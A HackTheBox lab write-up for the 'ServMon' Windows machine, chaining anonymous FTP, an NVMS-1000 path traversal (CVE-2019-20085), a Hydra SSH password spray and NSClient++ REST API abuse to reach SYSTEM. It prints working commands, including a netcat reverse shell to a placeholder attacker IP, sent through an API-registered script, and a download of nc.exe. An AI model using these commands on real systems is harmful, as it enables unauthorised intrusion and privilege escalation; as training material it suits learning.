~/writeups/ServMon
Easy Windows
ServMon.
Easy Windows Anonymous FTP CVE-2019-20085 Path Traversal NSClient++ HackTheBox
Easy Windows machine that chains four misconfigurations together. Anonymous FTP leaks an internal note revealing that Passwords.txt lives on Nathan's Desktop. NVMS-1000's unauthenticated path traversal (CVE-2019-20085) reads that file without any credentials. Password spraying over SSH lands a shell as nadine. NSClient++ — a monitoring agent running as NT AUTHORITY\SYSTEM — stores its API password in plaintext; forwarding its port via SSH tunnel and registering a malicious script through the REST API yields a SYSTEM shell.
User Flag
2687b43660xxxxxxxxxxxxxxxxxxxxxx
Root Flag
27da63c023xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Full port scan surfaces anonymous FTP, SSH, HTTP (NVMS-1000), SMB, and an HTTPS service on 8443 (NSClient++).

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.227.77 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed 22/tcp open ssh OpenSSH for_Windows_8.0 80/tcp open http redirects to /Pages/login.htm (NVMS-1000) 445/tcp open microsoft-ds Windows Server 8443/tcp open https NSClient++ web UI
NVMS-1000 is a network video surveillance management system by TVT with a known unauthenticated directory traversal (CVE-2019-20085) that reads arbitrary files without credentials.

NSClient++ is a Windows monitoring agent similar to Nagios NRPE. It runs as NT AUTHORITY\SYSTEM and can execute external scripts via a REST API — a classic privesc target.
02FTP Enumeration

Anonymous FTP allows browsing both user home directories. Two files leak the entire attack path.

ftp — anonymous login
$ ftp -p 10.129.227.77 # Username: anonymous Password: (blank) ftp> cd Users/Nadine ftp> get Confidential.txt ftp> cd ../Nathan ftp> get "Notes to do.txt"
Confidential.txt
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards, Nadine
Notes to do.txt
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS <-- NOT done 5) Place the secret files in SharePoint
key insight: Passwords.txt is on Nathan's Desktop, and NVMS public access is still open (item 4 incomplete). We can use the NVMS traversal to read the file unauthenticated.
03Directory Traversal — CVE-2019-20085

NVMS-1000 fails to sanitize ../ sequences in GET requests, allowing unauthenticated file reads anywhere on the filesystem. Standard Python exploit scripts silently normalize the traversal sequences away — use curl --path-as-is to send the raw path to the server.

curl --path-as-is — read Passwords.txt
$ curl --path-as-is \ "http://10.129.227.77/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt" 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
Why --path-as-is? By default curl (and most HTTP libraries) normalize URLs and strip ../ before sending. This flag disables normalization and sends the raw path exactly as written — required for the traversal payload to reach the server intact.
04Foothold — SSH as Nadine

Spray the recovered passwords against both known users over SSH.

hydra — password spray
$ hydra -L users.txt -P passwords.txt ssh://10.129.227.77 [22][ssh] host: 10.129.227.77 login: nadine password: L1k3B1gBut7s@W0rk
finding: Nathan's own passwords file — but Nadine reused one of them. Nathan's account didn't match.
SSH → user flag
$ ssh nadine@10.129.227.77 # Password: L1k3B1gBut7s@W0rk nadine@SERVMON C:\Users\Nadine\Desktop> type user.txt 2687b43660xxxxxxxxxxxxxxxxxxxxxx
user flag obtained.
05Privilege Escalation — NSClient++ → SYSTEM

NSClient++ is bound to 0.0.0.0:8443 but its config restricts API connections to 127.0.0.1 only. The config also stores the API password in plaintext. We bypass the localhost restriction with an SSH tunnel, then use the REST API to register and execute a reverse shell script — the service runs as SYSTEM.

Step 1 — Read nsclient.ini

nsclient.ini — credentials
nadine> type "C:\Program Files\NSClient++\nsclient.ini" password = ew2x6SsGTxjRwXOT allowed hosts = 127.0.0.1

Step 2 — SSH Port Forward

SSH tunnel → localhost:8443
$ ssh -L 8443:127.0.0.1:8443 nadine@10.129.227.77 -N -f $ ss -tlnp | grep 8443 LISTEN 0 128 127.0.0.1:8443 0.0.0.0:*

Step 3 — Verify API Access

curl — NSClient++ API info
$ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \ https://127.0.0.1:8443/api/v1/info {"name":"NSClient++","version":"0.5.2.35 2018-01-28",...}
TLS gotcha: NSClient++ 0.5.2 uses old TLS. Pass -k (skip cert verification) and --tlsv1.0. Run all API calls from Kali — the Windows curl inside the SSH session uses schannel and also fails on SSL errors.

Step 4 — Upload nc.exe to Target

serve nc.exe → download on target
# Kali $ cp /usr/share/windows-binaries/nc.exe . $ python3 -m http.server 8080 # SSH session on target nadine> mkdir C:\Temp nadine> curl http://YOUR_KALI_IP:8080/nc.exe -o C:\Temp\nc.exe

Step 5 — Register Malicious Script via API

PUT script — register evil.bat
$ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \ -X PUT "https://127.0.0.1:8443/api/v1/scripts/ext/scripts/evil.bat" \ --data-binary "C:\\Temp\\nc.exe YOUR_KALI_IP 4444 -e cmd.exe" Added evil as scripts\evil.bat

Step 6 — Start Listener and Execute

trigger → SYSTEM shell
# terminal 1 — listener $ nc -lvnp 4444 # terminal 2 — execute registered script $ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \ "https://127.0.0.1:8443/api/v1/queries/evil/commands/execute?time=3m" # shell received: connect to [10.10.14.78] from (UNKNOWN) [10.129.227.77] C:\Program Files\NSClient++> whoami nt authority\system
Why does this work? NSClient++ runs as a Windows service under NT AUTHORITY\SYSTEM. When it executes the registered script, the spawned process inherits that SYSTEM context — no further exploitation needed.
06Root Flag
root flag
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt 27da63c023xxxxxxxxxxxxxxxxxxxxxx
attack chain:
Anonymous FTP → Confidential.txt (password file location leak) → NVMS-1000 path traversal (CVE-2019-20085) + --path-as-isPasswords.txt → Hydra spray → nadine:L1k3B1gBut7s@W0rk SSH → nsclient.ini plaintext password → SSH port forward → NSClient++ REST API → PUT evil.bat → execute → SYSTEM
← all writeups